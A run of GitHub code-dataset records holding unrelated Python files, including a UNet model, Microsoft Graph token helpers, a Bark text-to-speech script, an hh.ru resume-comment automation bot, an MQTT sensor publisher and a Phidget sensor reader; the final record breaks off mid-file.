columns=[self._processing_detail]) \n \n def _postal_code_checker(self, df):\n '''\n (DataFrame) -> DataFrame\n The DataFrame of 'Postal_Code' is given, then return a new\n 'Postal_Code' DataFrame to fix any mismatch types of Canadian\n Postal Code. The only form that is right is'X1X1X1'. If there is\n data that is not the correct format, it will be replaced by an\n empty string.\n '''\n p_codes = list()\n # Initalize the regex\n p = re.compile('^([a-zA-z]?[0-9]){3}$')\n for value in df.get_values():\n # Get the value (string)\n postal_code = value\n postal_code = postal_code.replace('-', '')\n postal_code = postal_code.replace(' ', '')\n # Check if the given data matches the type\n if (len(postal_code) == 6 and p.match(postal_code)):\n p_codes.append(postal_code)\n else:\n # An empty string replaces the false data\n p_codes.append('')\n \n return pd.DataFrame(p_codes, columns=[self._postal_code]) \n \n def executed_properly(self):\n '''\n (Command) -> boolean\n\n Returns a boolean to determine if this command was executed properly\n '''\n return self._exec_status\n\ndef parse_all_columns(df, template):\n '''\n (DataFrame, TemplateHandler) -> List of\n [Tuple of (String, int)]\n \n Given a DataFrame and TemplateHandler, returns a tuple of all the\n fields that are not matching the regex/format.\n '''\n # List to store the tuples\n misformated = list()\n # Gets the column names to a list\n header_name = template.get_headers()\n \n for col_i in range(len(header_name)-1):\n column = df.get(header_name[col_i])\n if (column is not None):\n # Gets the Regex (has regex, regex value, example)\n regex = template.handle_template(header_name[col_i])\n if (regex[1] != \"\"):\n # Loop through all the fields\n for row in range(len(df.index)):\n misformated.append((header_name[col_i], row))\n \n return misformated\n","repo_name":"susanwang98/TEQ-App","sub_path":"src/commands/data_aggregator.py","file_name":"data_aggregator.py","file_ext":"py","file_size_in_byte":4453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"28881346759","text":"\"\"\" Full assembly of the parts to form the complete network \"\"\"\n\nfrom .unet_parts import *\n\n\nclass UNet(nn.Module):\n def __init__(self, n_channels, bilinear=False):\n super(UNet, self).__init__()\n self.n_channels = n_channels\n self.bilinear = bilinear\n\n self.inc = DoubleConv(n_channels, 64)\n self.down1 = Down(64, 128)\n self.down2 = Down(128, 256)\n self.down3 = Down(256, 512)\n factor = 2 if bilinear else 1\n self.down4 = Down(512, 1024 // factor)\n\n self.bc_up1 = Up(1024, 512 // factor, bilinear)\n self.bc_up2 = Up(512, 256 // factor, bilinear)\n self.bc_up3 = Up(256, 128 // factor, bilinear)\n self.bc_up4 = Up(128, 64, bilinear)\n self.bc_outc = OutConv(64, 3)\n\n self.r_up1 = Up(1024, 512 // factor, bilinear)\n self.r_up2 = Up(512, 256 // factor, bilinear)\n self.r_up3 = Up(256, 128 // factor, bilinear)\n self.r_up4 = Up(128, 64, bilinear)\n self.r_outc = OutConv(64, 1)\n\n self.m_up1 = Up(1024, 512 // factor, bilinear)\n self.m_up2 = Up(512, 256 // factor, bilinear)\n self.m_up3 = Up(256, 128 // factor, bilinear)\n self.m_up4 = Up(128, 64, bilinear)\n self.m_outc = OutConv(64, 1)\n\n self.n_up1 = Up(1024, 512 // factor, bilinear)\n self.n_up2 = Up(512, 256 // factor, bilinear)\n self.n_up3 = Up(256, 128 // factor, bilinear)\n self.n_up4 = Up(128, 64, bilinear)\n self.n_outc = OutConv(64, 3)\n\n def forward(self, x):\n x1 = self.inc(x)\n x2 = self.down1(x1)\n x3 = self.down2(x2)\n x4 = self.down3(x3)\n x5 = self.down4(x4)\n\n bc_x = self.bc_up1(x5, x4)\n bc_x = self.bc_up2(bc_x, x3)\n bc_x = self.bc_up3(bc_x, x2)\n bc_x = self.bc_up4(bc_x, x1)\n bc_logits = self.bc_outc(bc_x)\n\n r_x = self.r_up1(x5, x4)\n r_x = self.r_up2(r_x, x3)\n r_x = self.r_up3(r_x, x2)\n r_x = self.r_up4(r_x, x1)\n r_logits = self.r_outc(r_x)\n\n m_x = self.m_up1(x5, x4)\n m_x = self.m_up2(m_x, x3)\n m_x = self.m_up3(m_x, x2)\n m_x = self.m_up4(m_x, x1)\n m_logits = self.m_outc(m_x)\n\n n_x = self.n_up1(x5, x4)\n n_x = self.n_up2(n_x, x3)\n n_x = self.n_up3(n_x, x2)\n n_x = self.n_up4(n_x, x1)\n n_logits = self.n_outc(n_x)\n\n out = torch.cat([bc_logits, r_logits, m_logits, n_logits], dim=1)\n # print(out.size())\n\n\n return out\n","repo_name":"szu-advtech/AdvTech","sub_path":"2022/22-姜柳彤 指导老师-胡瑞珍/unet/unet_model.py","file_name":"unet_model.py","file_ext":"py","file_size_in_byte":2485,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"19"} +{"seq_id":"18070449360","text":"# https://leetcode.com/problems/two-sum/\n\nclass Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n \n start = 0\n end = len(nums)-1\n \n while start < end:\n \n for i in range(start, end):\n \n if nums[start] + nums[i+1] == target:\n return start, i+1\n \n start += 1\n \n return -1\n","repo_name":"mmilett14/leetcode","sub_path":"algorithms/1_two_sum.py","file_name":"1_two_sum.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"17999145360","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis module contains the functions used to get the access token for MS Graph.\n\"\"\"\n\n\nfrom msal import ConfidentialClientApplication, PublicClientApplication\n\nAUTHORITY = \"https://login.microsoftonline.com/\"\nSCOPE = [\"https://graph.microsoft.com/.default\"]\n\n\ndef obtain_accesstoken_app(TENANT_NAME, CLIENT_ID, CLIENT_SECRET):\n \"\"\"\n This function is used to get an access token to MS Graph using client credentials.\n\n :param TENANT_NAME: The name of the Azure tenant\n :param CLIENT_ID: The ID of the registered Azure AD application\n :param CLIENT_SECRET: Secret of the registered Azure AD application\n :return: The access token\n \"\"\"\n\n # Create app instance\n app = ConfidentialClientApplication(\n client_id=CLIENT_ID,\n client_credential=CLIENT_SECRET,\n authority=AUTHORITY + TENANT_NAME,\n )\n\n token = None\n\n try:\n # Check if token is already cached\n token = app.acquire_token_silent(SCOPE, account=None)\n\n # If not, get a new token\n if not token:\n token = app.acquire_token_for_client(scopes=SCOPE)\n if not token:\n raise Exception(\"No token returned\")\n\n except Exception as e:\n raise Exception(\"Error obtaining access token: \" + str(e))\n\n return token\n\n\ndef obtain_accesstoken_cert(TENANT_NAME, CLIENT_ID, THUMBPRINT, KEY_FILE):\n \"\"\"\n This function is used to get an access token to MS Graph using a certificate.\n\n :param TENANT_NAME: The name of the Azure tenant\n :param CLIENT_ID: The ID of the registered Azure AD application\n :param THUMBPRINT Thumbprint of the certificate uploaded to Azure AD\n :param KEY_FILE: Path to the private key of the certificate\n :return: The access token\n \"\"\"\n\n # Create app instance\n app = ConfidentialClientApplication(\n client_id=CLIENT_ID,\n client_credential={\n \"thumbprint\": THUMBPRINT,\n \"private_key\": open(KEY_FILE).read(),\n },\n authority=AUTHORITY + TENANT_NAME,\n )\n\n token = None\n\n try:\n # Check if token is already cached\n token = app.acquire_token_silent(SCOPE, account=None)\n\n # If not, get a new token\n if not token:\n token = app.acquire_token_for_client(scopes=SCOPE)\n if not token:\n raise Exception(\"No token returned\")\n\n except Exception as e:\n raise Exception(\"Error obtaining access token: \" + str(e))\n\n return token\n\n\ndef obtain_accesstoken_interactive(TENANT_NAME, CLIENT_ID):\n \"\"\"\n This function is used to get an access token to MS Graph interactivly.\n\n :param TENANT_NAME: The name of the Azure tenant\n :param CLIENT_ID: The ID of the registered Azure AD application\n :return: The access token\n \"\"\"\n\n # Create app instance\n app = PublicClientApplication(\n client_id=CLIENT_ID,\n client_credential=None,\n authority=AUTHORITY + TENANT_NAME,\n )\n\n token = None\n\n # Set the requited scopes\n scopes = [\n \"DeviceManagementApps.ReadWrite.All\",\n \"DeviceManagementConfiguration.ReadWrite.All\",\n \"DeviceManagementManagedDevices.Read.All\",\n \"DeviceManagementServiceConfig.ReadWrite.All\",\n \"Group.Read.All\",\n \"Policy.ReadWrite.ConditionalAccess\",\n \"Policy.Read.All\",\n ]\n\n try:\n # Get the token interactively\n token = app.acquire_token_interactive(\n scopes=scopes, max_age=1200, prompt=\"select_account\"\n )\n\n if not token:\n raise Exception(\"No token returned\")\n\n except Exception as e:\n raise Exception(\"Error obtaining access token: \" + str(e))\n\n return token\n","repo_name":"almenscorner/IntuneCD","sub_path":"src/IntuneCD/get_accesstoken.py","file_name":"get_accesstoken.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"19"} +{"seq_id":"9869871212","text":"#Authors\n#Sean Brill \n#James Campbell\n#source: https://github.com/suno-ai/bark\n\nfrom transformers import AutoProcessor, BarkModel\nimport scipy \n\n#must use cpu if you do not have a CUDA enabled NVIDIA GPU\n#must also set up CUDA\noutput_dir = './audio_outputs'\nproccessor = None\nmodel = None\ndevice = 'cpu' #default to cpu\n\ndef useGPU():\n global device\n device = 'cuda:0'\n\ndef useCPU():\n global device\n device = 'cpu'\n\n\n#possible devices\n#cpu\n#cuda:0\n#cuda:1\n#cuda:n where n is the gpu index\n\n\ndef generate_audio(text, preset, file_name):\n inputs = proccessor(text, voice_preset=preset)\n for k, v in inputs.items():\n inputs[k] = v.to(device)\n audio_array = model.generate(**inputs)\n audio_array = audio_array.cpu().numpy().squeeze()\n sample_rate = model.generation_config.sample_rate\n scipy.io.wavfile.write(output_dir + '/' + file_name, rate=sample_rate, data=audio_array)\n\ndef initialize():\n global proccessor\n global model\n proccessor = AutoProcessor.from_pretrained(\"suno/bark\")\n model = BarkModel.from_pretrained(\"suno/bark\")\n model.to(device)\n\n\nuseGPU()\ninitialize()\n\ngenerate_audio(\n text=\"Hello, what you are hearing is completly AI generated audio.. pretty cool huh!? Lets get coding mother fuckers!\",\n preset=\"v2/en_speaker_0\",\n file_name=\"output2.wav\"\n)\n\n\n\n","repo_name":"seanbrill/AI_Voice_Cloning","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20670630257","text":"#color testing\r\n'''from colorama import colored\r\nprint (colored('hello', 'red'), colored('world', 'green'))'''\r\n\r\ninvalid=True\r\nwhile invalid:\r\n date=int(input(\"date: \"))\r\n M= date//1000000\r\n D= date//10000 %100\r\n Y= date%10000\r\n if M==2 and D <=28 or (M==2 and D <=29 and (Y%4==0 and Y%100!=0 or Y%400==0)):\r\n invalid=False\r\n elif (M==4 or M==6 or M==9 or M==11) and D<=30:\r\n invalid=False\r\n elif (M==1 or M==3 or M==5 or M==7 or M==8 or M==10 or M==12) and D<=31:\r\n invalid=False\r\nprint(\"You have entered a valid date.\")\r\n \r\n","repo_name":"poisonivysaur/LOGPROG","sub_path":"ITERATIVE STATEMENTS & LOOPING exercises/Oct 29 loops challenge/DATE VALIDATOR.py","file_name":"DATE VALIDATOR.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18574792078","text":"import logging\nimport re\n\nfrom ariadne.classifier import Classifier\nfrom .inception_util import create_prediction\nfrom cassis import Cas\n\n_the_re = re.compile(r'\\bthe\\b', re.IGNORECASE)\n_logger = logging.getLogger(\"the_classifier\")\n\n\nclass TheClassifier(Classifier):\n \"\"\"\n Classifier marks all 'the' in the text\n \"\"\"\n def __init__(self, value_str: str = 'the'):\n super().__init__()\n self.value_str = value_str\n\n def predict(self, cas: Cas, layer: str, feature: str, project_id: str, document_id: str, user_id: str):\n _logger.info(f\"Got predict query: layer='{layer}', feature='{feature}', project_id: '{project_id}', \"\n f\"document_id: {document_id}, user_id: {document_id}\")\n text = cas.sofa_string\n for m in _the_re.finditer(text):\n pos = m.span()\n prediction = create_prediction(cas, layer, feature, pos[0], pos[1], self.value_str)\n cas.add_annotation(prediction)\n","repo_name":"serge-sotnyk/inception-external-recommender","sub_path":"ariadne/contrib/the_classifier.py","file_name":"the_classifier.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"42651408428","text":"import os\r\nimport settings_manager\r\nimport logger\r\nimport sys\r\nimport time\r\nimport configparser\r\nfrom http.server import BaseHTTPRequestHandler\r\nfrom queue import Queue\r\nfrom datetime import datetime\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib.parse import urlparse\r\nfrom urllib.parse import unquote\r\nfrom pages.hh_main_page import HhMainPage\r\nfrom pages.hh_resume_page import HhResumePage\r\nfrom chrome import Chrome\r\nfrom pages.base_element import BaseElement\r\nfrom random import randint\r\n\r\nrequest_queue = Queue()\r\n\r\n\r\nclass HhAutomationHTTPRequestHandler(BaseHTTPRequestHandler):\r\n\r\n def do_GET(self):\r\n\r\n self.send_response(200)\r\n self.send_header('Content-type', 'text-html')\r\n self.end_headers()\r\n\r\n request_queue.put(self.path)\r\n\r\n return\r\n\r\n\r\nclass Automaton():\r\n config = configparser.ConfigParser()\r\n config.read(\"config.ini\")\r\n MIN_WAIT_AFTER_TASK_COMPLETED = \\\r\n int(config['DEFAULT']['MIN_WAIT_AFTER_TASK_COMPLETED'])\r\n\r\n SHARED_DIR = \\\r\n config['DEFAULT']['SHARED_DIR']\r\n MAX_LINK_CLICK_COUNT = \\\r\n int(config['DEFAULT']['MAX_LINK_CLICK_COUNT'])\r\n PRODUCTION_ENV = \\\r\n bool(config['DEFAULT']['PRODUCTION_ENV'])\r\n\r\n def __init__(self):\r\n self.chrome = None\r\n self.hh_username = None\r\n self.hh_password = None\r\n self.estaff_user_xml = None\r\n self.main_page = None\r\n self.hh_resume_page = None\r\n self.current_task = {}\r\n self.current_user = None\r\n self.current_url = None\r\n self.current_comments = None\r\n\r\n def check_queue(self):\r\n return not request_queue.empty()\r\n\r\n def parse_url(self):\r\n\r\n if request_queue.empty():\r\n return None\r\n\r\n raw_path = request_queue.get()\r\n parsed_url = urlparse(raw_path)\r\n cur_command = parsed_url.path.replace(\"/\", \"\").strip()\r\n cur_query = parsed_url.query.strip()\r\n cur_path = raw_path.replace(\"/\", \"\", 1) \\\r\n .strip().lower().replace(\" \", \"\")\r\n\r\n if not cur_command or not cur_query:\r\n return None\r\n\r\n command_n_params = \\\r\n dict(element.split(\"=\") for element in cur_query.split(\"&\"))\r\n\r\n command_n_params[\"raw_query\"] = cur_path\r\n command_n_params[\"command\"] = cur_command\r\n\r\n return command_n_params\r\n\r\n def execute_command(self):\r\n if (not self.current_task[\"command\"]):\r\n return False\r\n\r\n if self.current_task[\"command\"] == \"put_comments\":\r\n return self.put_comments_to_hh()\r\n elif self.current_task[\"command\"] == \"get_comments\":\r\n return self.get_comments_from_hh()\r\n\r\n def check_authorization_at_hh(self):\r\n if self.main_page is None:\r\n self.main_page = HhMainPage(driver=self.chrome.browser)\r\n self.main_page.go()\r\n\r\n self.imitate_humans_delay()\r\n self.main_page.button_current_region.click()\r\n self.imitate_humans_delay()\r\n\r\n if (not self.main_page.authorize_hh_user(login=self.hh_username,\r\n password=self.hh_password)):\r\n logger. \\\r\n log_event(\"Ошибка. Не удалось авторизоваться на сайте hh.ru.\")\r\n return False\r\n\r\n return True\r\n\r\n def init_and_authorize(self):\r\n if (not self.current_task[\"url\"]):\r\n return False\r\n\r\n if not self.get_credentials():\r\n return False\r\n\r\n if not self.initialize_browser():\r\n return False\r\n\r\n self.current_user = self.current_task[\"user\"]\r\n\r\n if not self.check_authorization_at_hh():\r\n return False\r\n\r\n return True\r\n\r\n def goto_resume_page(self):\r\n\r\n r_url = \"https://hh.ru/resume/\" + self.current_task[\"url\"]\r\n\r\n if (self.hh_resume_page is None) or (self.current_url != r_url):\r\n self.hh_resume_page = HhResumePage(resume_url=r_url,\r\n driver=self.chrome.browser)\r\n if not self.hh_resume_page.go():\r\n if self.hh_resume_page.CAPTCHA_RAISED:\r\n logger.log_event(\"Замечена Captcha. Завершаем программу. \")\r\n try:\r\n self.chrome.close()\r\n self.chrome.browser.quit()\r\n sys.exit()\r\n except:\r\n sys.exit()\r\n else:\r\n return False\r\n\r\n self.current_url = r_url\r\n return True\r\n\r\n def imitate_humans_delay(self,\r\n min_delay=BaseElement.MIN_WAIT_SEC,\r\n max_delay=BaseElement.USUAL_WAIT_SEC):\r\n\r\n time.sleep(randint(min_delay, max_delay))\r\n\r\n def put_comments_to_hh(self):\r\n\r\n comments_str = unquote(self.current_task[\"comments\"]).strip()\r\n\r\n if not comments_str:\r\n return False\r\n\r\n if not self.init_and_authorize():\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.goto_resume_page():\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n # Проверим, что на странице уже нет комментария\r\n # с таким же текстом, добавленного вручную\r\n search_string = comments_str.split(\"\\n\", 1)[1]\r\n click_count = 0\r\n while (self.hh_resume_page.more_comments_link.click()) \\\r\n and (click_count < self.MAX_LINK_CLICK_COUNT):\r\n click_count += 1\r\n self.imitate_humans_delay()\r\n continue\r\n\r\n comment_elements = self.hh_resume_page.get_comment_items().web_elements\r\n if (comment_elements):\r\n for comment_element in comment_elements:\r\n try:\r\n elements_array = comment_element.text.strip().split(\"\\n\")\r\n\r\n if (search_string == elements_array[0].strip()) \\\r\n or (comments_str == elements_array[0].strip()):\r\n return False\r\n except:\r\n break\r\n\r\n if not self.hh_resume_page.add_comment_link.click():\r\n logger.log_event(\"Ошибка. Не удалось \" +\r\n \"кликнуть кнопку добавления \" +\r\n \"комментария на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.hh_resume_page.comment_text_area:\r\n logger.log_event(\"Ошибка. Не найдено поле \" +\r\n \"для записи комментария \" +\r\n \"на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n if not \\\r\n self.hh_resume_page.comment_text_area. \\\r\n input_text(comments_str):\r\n\r\n logger.log_event(\"Ошибка. Не удалось \" +\r\n \"поместить текст комментария \" +\r\n \"в текстовое поле на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.hh_resume_page.save_comment_button.click():\r\n logger.log_event(\"Ошибка. Не удалось кликнуть \" +\r\n \"кнопку сохранения \" +\r\n \"комментария на странице резюме \" +\r\n self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n return True\r\n\r\n def get_comments_from_hh(self):\r\n\r\n if not self.init_and_authorize():\r\n return False\r\n\r\n self.imitate_humans_delay()\r\n\r\n if not self.goto_resume_page():\r\n return False\r\n\r\n click_count = 0\r\n while (self.hh_resume_page.more_comments_link.click()) \\\r\n and (click_count < self.MAX_LINK_CLICK_COUNT):\r\n click_count += 1\r\n self.imitate_humans_delay()\r\n continue\r\n\r\n comment_elements = self.hh_resume_page.get_comment_items().web_elements\r\n response_string = \"\"\r\n\r\n if (comment_elements):\r\n for comment_element in comment_elements:\r\n try:\r\n elements_array = comment_element.text.strip().split(\"\\n\")\r\n\r\n if (\"(ES,\" in elements_array[0]) \\\r\n or (not elements_array[0].strip()):\r\n continue # этот коммент был ранее загружен из E-staff\r\n\r\n response_string = response_string \\\r\n + \"Пользователь: {}, Комментарий:{} \". \\\r\n format(elements_array[1], elements_array[0]) + \"\\n\"\r\n except:\r\n logger.log_event(\"Ошибка при получении комментариев \"\r\n + \"со страницы резюме \"\r\n + self.current_task[\"url\"])\r\n return False\r\n\r\n if not response_string.strip():\r\n return False\r\n\r\n response_string = \"Комментарии получены\" \\\r\n + \" со страницы https://hh.ru/resume/\" \\\r\n + self.current_task[\"url\"] + \" роботом \" \\\r\n + datetime.today().strftime('%d-%m-%Y') \\\r\n + \". \" + \"\\n\\n\\n\" + response_string\r\n\r\n try:\r\n settings_manager. \\\r\n write_data_to_file(str.encode(response_string,\r\n 'UTF-8'), self.generate_file_name())\r\n \r\n return True\r\n except:\r\n logger.log_event(\"Ошибка при записи файла\"\r\n + \" комментариев со страницы резюме \"\r\n + self.current_task[\"url\"])\r\n\r\n return False\r\n\r\n def generate_file_name(self):\r\n return os.path.join(os.path.normpath(self.SHARED_DIR),\r\n self.current_task[\"command\"] + \"_\"\r\n + self.current_task[\"doc_id\"])\r\n\r\n\r\n def get_credentials(self):\r\n\r\n if (self.current_user == self.current_task[\"user\"]) \\\r\n and (self.estaff_user_xml is not None):\r\n return True\r\n\r\n if self.PRODUCTION_ENV:\r\n user_prefs = \\\r\n settings_manager \\\r\n .read_settings_from_file(\"user_settings_prod.txt\")\r\n else:\r\n user_prefs = settings_manager \\\r\n .read_settings_from_file(\"user_settings_test.txt\")\r\n\r\n soup = BeautifulSoup(user_prefs, 'lxml')\r\n self.estaff_user_xml = soup.find(\"estaff_username\",\r\n string=self.current_task[\"user\"])\r\n\r\n if self.estaff_user_xml is None:\r\n logger.log_event(\"Ошибка. \\\r\n Не найдены настройки пользователя E-staff \"\r\n + self.current_task[\"user\"])\r\n return False\r\n\r\n self.hh_username = self.estaff_user_xml. \\\r\n parent.hh_username.string.strip()\r\n self.hh_password = self.estaff_user_xml. \\\r\n parent.hh_password.string.strip()\r\n\r\n return True\r\n\r\n def initialize_browser(self):\r\n\r\n if (self.current_user == self.current_task[\"user\"]) \\\r\n and (self.chrome is not None) \\\r\n and (self.chrome.get_status()):\r\n return True\r\n\r\n if self.estaff_user_xml is None:\r\n return False\r\n\r\n try:\r\n self.chrome = Chrome(driver='chromedriver',\r\n browser_options=[opt.string for\r\n opt in self.estaff_user_xml.\r\n parent.chrome_options if\r\n opt.string.strip() != \"\"])\r\n self.main_page = None\r\n self.hh_resume_page = None\r\n except:\r\n return False\r\n\r\n return True\r\n","repo_name":"tyashin/hh.ru-cv-comments-crawler","sub_path":"hh_automation_server.py","file_name":"hh_automation_server.py","file_ext":"py","file_size_in_byte":12550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"16764682920","text":"'''\nMQTT is a binary based protocol where the control elements are binary bytes and not text strings. \nTopic names, Client ID, User names and Passwords are encoded as stream of bytes using UTF-8.\n'''\n\nimport time\nimport json\nimport numpy as np\nimport datetime as dt\nimport paho.mqtt.client as mqtt\n\n\ndef on_publish(client, userdata, mid):\n print(\"sent a message\")\n\n\nmqttClient = mqtt.Client(\"engine_data\")\nmqttClient.on_publish = on_publish\nmqttClient.connect('localhost', 1883)\n# start a new thread\nmqttClient.loop_start()\n\n# Why use msg.encode('utf-8') here\n# MQTT is a binary based protocol where the control elements are binary bytes and not text strings.\n# Topic names, Client ID, Usernames and Passwords are encoded as stream of bytes using UTF-8.\nwhile True:\n msg = {\n \"sensor_id\": \"sensor_1\",\n \"vibration\": np.random.randint(0, 100),\n \"acceleration_x\": np.random.randint(0, 100),\n \"acceleration_y\": np.random.randint(0, 100),\n \"acceleration_z\": np.random.randint(0, 100),\n \"timestamp\": dt.datetime.now().isoformat()\n }\n info = mqttClient.publish(\n topic='engine_measures',\n payload=json.dumps(msg).encode('utf-8'),\n qos=0,\n )\n # Because published() is not synchronous,\n # it returns false while he is not aware of delivery that's why calling wait_for_publish() is mandatory.\n info.wait_for_publish()\n print(\"Message published: \", info.is_published())\n time.sleep(3)\n","repo_name":"Charlie5DH/Full-Stack-Kafka-Stack","sub_path":"mqtt/producer2.py","file_name":"producer2.py","file_ext":"py","file_size_in_byte":1467,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"24170371199","text":"from brownie import network, config, accounts, MockV3Aggregator\n\nDECIMALS = 8\nSTARTING_PRICE = 200000000000\nLOCAL_BLOCKCHAIN_ENVIRONMENTS = [\"development\", \"ganache-local\"]\nFORKED_LOCAL_ENVIRONMENTS = [\"mainnet-fork-dev\"]\n\n\ndef getAccount():\n if (\n network.show_active() in LOCAL_BLOCKCHAIN_ENVIRONMENTS\n or network.show_active() in FORKED_LOCAL_ENVIRONMENTS\n ):\n return accounts[0]\n else:\n return accounts.add(config[\"wallets\"][\"from_key\"])\n\n\ndef deployMocks():\n print(f\"Active network is {network.show_active()}\")\n print(\"deploying mocks\")\n if len(MockV3Aggregator) <= 0:\n MockV3Aggregator.deploy(DECIMALS, STARTING_PRICE, {\"from\": getAccount()})\n print(\"deployed mocks\")\n","repo_name":"mistrg/brownie-fundme","sub_path":"scripts/helpful_scripts.py","file_name":"helpful_scripts.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"647889644","text":"#from _typeshed import Self\nfrom math import trunc\nfrom Phidget22.Phidget import *\nfrom Phidget22.Devices.Accelerometer import *\nfrom Phidget22.Devices.Gyroscope import *\nfrom Phidget22.Devices.Magnetometer import *\nfrom Phidget22.Devices.Spatial import *\n\nimport time\nimport math\n\nfrom threading import Thread, Lock\n\ndef onMagneticFieldChange(self, magneticField, timestamp):\n if PhidgetThread._instance != None:\n PhidgetThread._instance.setMagFeild(magneticField)\n #print(\"MagneticField: \\t\"+ str(magneticField[0])+ \" | \"+ str(magneticField[1])+ \" | \"+ str(magneticField[2]))\n #print(\"Timestamp: \" + str(timestamp))\n #print(\"----------\")\n\ndef onAccelerationChange(self, acceleration, timestamp):\n pass\n\t#print(\"Acceleration: \\t\"+ str(acceleration[0])+ \" | \"+ str(acceleration[1])+ \" | \"+ str(acceleration[2]))\n\t#print(\"Timestamp: \" + str(timestamp))\n\t#print(\"----------\")\n\ndef onAngularRateUpdate(self, angularRate, timestamp):\n pass\n\t#print(\"AngularRate: \\t\"+ str(angularRate[0])+ \" | \"+ str(angularRate[1])+ \" | \"+ str(angularRate[2]))\n\t#print(\"Timestamp: \" + str(timestamp))\n\t#print(\"----------\")\n\ndef onSpatialData(self, acceleration, angularRate, magneticField, timestamp):\n pass\n\t#print(\"Acceleration: \\t\"+ str(acceleration[0])+ \" | \"+ str(acceleration[1])+ \" | \"+ str(acceleration[2]))\n\t#print(\"AngularRate: \\t\"+ str(angularRate[0])+ \" | \"+ str(angularRate[1])+ \" | \"+ str(angularRate[2]))\n\t#print(\"MagneticField: \\t\"+ str(magneticField[0])+ \" | \"+ str(magneticField[1])+ \" | \"+ str(magneticField[2]))\n\t#print(\"Timestamp: \" + str(timestamp))\n\t#print(\"----------\")\n\ndef onAlgorithmData(self, quaternion, timestamp):\n #print(\"Quaternion: \" + str(quaternion))\n #print(\"Timestamp \" + str(timestamp))\n ea = euler_from_quaternion(quaternion[0],quaternion[1],quaternion[2],quaternion[3])\n #print(\"roll \" + str(ea[0]))\n #print(\"pith \" + str(ea[1]))\n #print(\"yaw \" + str(ea[2]))\n #print('roll {0} pitch {1} yaw {2}'.format(ea[0], ea[1], ea[2]))\n\ndef euler_from_quaternion(x, y, z, w):\n #print('call euler_from_quaternion')\n \"\"\"\n Convert a quaternion into euler angles (roll, pitch, yaw)\n roll is rotation around x in radians (counterclockwise)\n pitch is rotation around y in radians (counterclockwise)\n yaw is rotation around z in radians (counterclockwise)\n \"\"\"\n global roll_x\n global pitch_y\n global yaw_z\n t0 = +2.0 * (w * x + y * z)\n t1 = +1.0 - 2.0 * (x * x + y * y)\n roll_x = math.atan2(t0, t1)\n \n t2 = +2.0 * (w * y - z * x)\n t2 = +1.0 if t2 > +1.0 else t2\n t2 = -1.0 if t2 < -1.0 else t2\n pitch_y = math.asin(t2)\n \n t3 = +2.0 * (w * z + x * y)\n t4 = +1.0 - 2.0 * (y * y + z * z)\n yaw = math.atan2(t3, t4)\n #setyaw(yaw)\n if PhidgetThread._instance != None:\n PhidgetThread._instance.set_yaw(math.degrees(yaw))\n PhidgetThread._instance.set_pitch(math.degrees(pitch_y))\n PhidgetThread._instance.set_roll(math.degrees(roll_x))\n #print('yaw_z1', \n return math.degrees(roll_x), math.degrees(pitch_y), math.degrees(yaw) # in radians\n \n\nclass PhidgetMag:\n\n def __init__(self, xmag, ymag, zmag):\n self.xmag = xmag\n self.ymag = ymag\n self.zmag = zmag\n\n\n\n\nclass PhidgetThread (Thread):\n _instance = None\n _instance_count = 0\n _run_thread = True\n \n\n def __init__(self):\n Thread.__init__(self)\n PhidgetThread._instance = self\n \"\"\"self.magnetometer0 = Magnetometer()\n self.accelerometer0 = Accelerometer()\n self.gyroscope0 = Gyroscope()\"\"\"\n self.run_thread = True\n self.connected = False\n\n \"\"\"self.accelerometer0.setOnAccelerationChangeHandler(onAccelerationChange)\n self.gyroscope0.setOnAngularRateUpdateHandler(onAngularRateUpdate)\n self.magnetometer0.setOnMagneticFieldChangeHandler(onMagneticFieldChange)\n self.spatial0.setOnSpatialDataHandler(onSpatialData)\n self.spatial0.setOnAlgorithmDataHandler(onAlgorithmData)\"\"\"\n\n \"\"\"self.accelerometer0.openWaitForAttachment(1000)\n self.gyroscope0.openWaitForAttachment(1000)\n self.magnetometer0.openWaitForAttachment(1000)\n self.spatial0.openWaitForAttachment(1500)\"\"\"\n self.spatial0 = Spatial()\n self.spatial0.setOnAlgorithmDataHandler(onAlgorithmData)\n\n self.phidgetMag = PhidgetMag(-1,-1,-1)\n self.yaw = 0\n self.pitch = 0\n self.roll = 0\n self.msglock = Lock()\n\n def connect(self):\n try:\n self.spatial0.openWaitForAttachment(1500)\n self.connected = True\n except:\n self.connected = False\n\n\n def run(self):\n #return\n print(\"started PhidgetThread thread\")\n try:\n #self.accelerometer0.openWaitForAttachment(5000)\n #self.gyroscope0.openWaitForAttachment(5000)\n #self.magnetometer0.openWaitForAttachment(5000)\n #self.spatial0.openWaitForAttachment(5000)\n\n while self.run_thread:\n if not self.connected:\n self.connect()\n 